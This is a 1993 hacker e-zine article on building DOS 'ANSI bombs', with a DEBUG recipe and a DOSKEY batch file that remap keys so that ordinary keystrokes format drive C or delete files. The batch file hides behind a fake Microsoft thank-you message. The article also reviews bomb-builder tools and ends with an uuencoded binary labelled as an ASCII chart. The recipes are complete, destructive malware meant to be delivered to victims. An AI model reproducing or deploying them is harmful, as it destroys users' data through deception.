DnA 9-9: Constructing the ANSi Bomb
Part ][....By Vandal
USING DOS'S DEBUG COMMAND TO CREATE ANSi BOMBS
Well, In the last issue of DnA, if you read my article, you learned the basics of constructing an ANSi bomb. Now I shall get to the more advanced techniques with the DEBUG program and Dos Key for Dos. Now we all know what an ansi bomb is for, how to create one and how to properly Deliver it to the phiend of your choice. I have used several methods and had success with most of them now lets get on with the article.
DEBUG???
If you do not know how to use Debug then before reading this article you should consult a DOS manual.
METHOD
-Here is the necessary formula for creating A bomb with this method.... Merely replace the command in the formula with the command ov Your choice
A:DOS\DEBUG
-A 100
MOV AH,9
MOV DX,109
INT 21
INT 20
####:#### DB 1B'[0;32;"ECHO Y|FORMAT C:>NUL";13p'
####:???? DB 1B'[0;21;"echo Y|Del *.*>nul";13p'
-N boom!.com
-R BX
BX:0000
:0
-R CX
CX 0000
:???? (write number from "???" above here!!)
-W
After this the Computer SHOULD respond with the following
WRITING nnnn bytes
-Q
Now when you look in your directory there should be a Program called Boom!.com DO NOT RUN IT!! it is a bomb that when the space bar is hit will format the C drive, and when someone types the ! key it will delete the directory.
There ya go, enjoy.....
USING DOSKEY TO CREATE BOMBS
OK well there is another method of remapping the keys on someones keys WITHOUT relying on the ANSi driver, this method requires the DOSKEY command in dos. This method is simple and makes it possible for you to issue commands in complete words (example: dir=echo y |format c:). This method can only be used in batch philes, NOT when infecting pictures. And When the batch phile is run "DOSKey active" will appear under the command line. BUT a quick "CLS" will keep that hidden!!
Heres a simple Batch phile
Copy Con Boom.bat
@echo off
doskey dir=echo y|format c:>nul
cls
@echo:thank you for choosing Microsoft
Simple Huh, when using this method any comand "macro" can be used to Any command!! another example could be "DOSKEY .=DIR A: /W /S /P"
if you plan to use this method then you better be sure that your victim has the DosKey command in his\her path!!
This method works best if you transfer the batch philes into COM philes I don't know about you but I check all the batch philes I get for anything that looks funny..
Here is a minor Ascii Key Chart to help you in your creation, enjoy...
ASCII Key Codes...
a-97 b-98 c-99 d-100 e-101 f-102 g-103 h-104 i-105 j-106
k-107 l-108 m-109 n-110 o-111 p-112 q-113 r-114 s-115 t-116
u-117 v-118 w-119 x-120 y-121 z-122 (Space)-32
A-65 B-66 C-67 D-68 E-69 F-70 G-71 H-72 I-73 J-74
K-75 L-76 M-77 N-78 O-79 P-80 Q-81 R-82 S-83 T-84
U-85 V-86 W-87 X-88 Y-89 Z-90 (return)-13
1-49 2-50 3-51 4-52 5-53 6-54 7-55 8-56 9-57 0-48
CHANGING YOUR SYSTEM COLORS
Here's another way to use the ANSi Driver....Changing the colors on your system To Chang your system colors use "Prompt $e[#;#m" command
Color Schemes.. You can Also Use the ANSi driver to change the colors of your System, I know this seems worthless, But I'm sure you can find a purpose for it.....
--FOREGROUND COLORS-- --BACKGROUND COLORS--
30 black 40 Black
31 red 41 red
32 green 42 green
33 yellow 43 yellow
34 blue 44 blue
35 magenta 45 magenta
36 cyan 46 cyan
37 white 47 white
0 will turn the colors off (back to normal)
Reviews of products!!
Ansib.zip-This is a nice little system that allows you to create a bomb that you can later, or at the time add to a picture!!
tja_ansi.zip-Very similiar to the last but A LOT easier to use, This is One of the best I've seen, so if you see it get it!!
tabg_2b.zip-Almost the same as tja_ansi but for some reason this one comes up on a virus scan with F-PROT 2.09
AFTERWARD
--Well I hope You have enjoyed this article, with the help of this article and my article in DnA V1I4 you should be well on your way to destruction--
Special Thanx To the Following..
⁄ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒø
≥ Jackel-without him this article would not exist ≥
≥ Arclight-For all the Info ≥
≥ C.Scot Giles-For His wonderful article on ANSi Key re-assignment ≥
≥ Pazuzu-For putting this in here ≥
≥ Nuke-For the reviews ov products that they created ≥
≥ 2600-For Help in my last article ≥
≥ AND LAST BUT NOT LEAST..to all the readers.... ≥
¿ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒŸ
Thank you for reading hope you enjoyed the article......
-Vandal
[DnA] `93
Below is A uuencode For a resident ascii chart
Cut at the line , name the phile ascii.uue and "UUDECODE ASCII.UUE" to create
-----------
section 1 of uuencode 2.8 of file ascii.com by R.E.M.
begin 644 ascii.com
MZ4<R````````````N`"P!W$!`Q@`2@#P!@``05-#24D@5C$N,#,@;F]W(&QOW
M861E9"P@<')E<W,@0U123"M2:6=H="U3:&EF="!T;R!A8W1I=F%T92Y#;W!Y=
M<FEG:'0@*&,I($1I=F5R<VEF:65D($-O;7!U=&5R(%-E<G9I8V5S($EN8RX`/
M`````````````````````````````````````````````````````````````
M`````````````````````````````````````````````````````````````
...
M`````````````````````````````````````````````````````````````
M````^U!345)65QX&G"[_'@,!M`+-%B0%/`5U12Z`/@@!`70]#A\.!R[&!@@!Y
M`>C5`+M&'2[&!@<!`.@M`+N&`2[&!@<!`>@A`.CH`+M&'2[&!@<!`>@2`.C'M
M`"[&!@@!``<?7UY:65M8SRZ*)A$!+H@F&0$NBPX3`5$NBB82`2Z()AH!+HL..
M%0$NBC89`2Z*%AH!Z"\`42Z+#@L!+H`^!P$`=0CH*P")!^L&D(L'Z#,`62[^R
M!AH!@\,"XLU9+OX&&0'BM<.PH/;FT.*V``/"B_C#'HOWCMDN.PX-`70#Z!,`B
MK1_#!H[!+CL.#0%T`^@#`*L'PU!2NMH#[*@!=?OLJ`%T^UI8P[0#MP#-$"Z)[
M#@D!M`&P`+L``+4@L0"Z``#-$,.T`;``NP``+HL."0&Z``#-$,.T`<T6=/JT%
M`,T6P[0/S1`\!W4.H0T!HPL!BB8/`8@F$`&[1AV-/H8!BPX7`8HF$`&*!ZM#%
MXOJ[&P&Y.@#H+0"[5@&Y,`#H)`"X``".V*$D`":C`P&A)@`FHP4!^L<&)``.-
M,HP.)@#[NDHSS2>*!^@.`$/B^+`-Z`8`L`KH`0##4[L``+0.S1!;PP``````V
M`````````````````````````````````````````````````````````````
&`````````
``
end
size 13056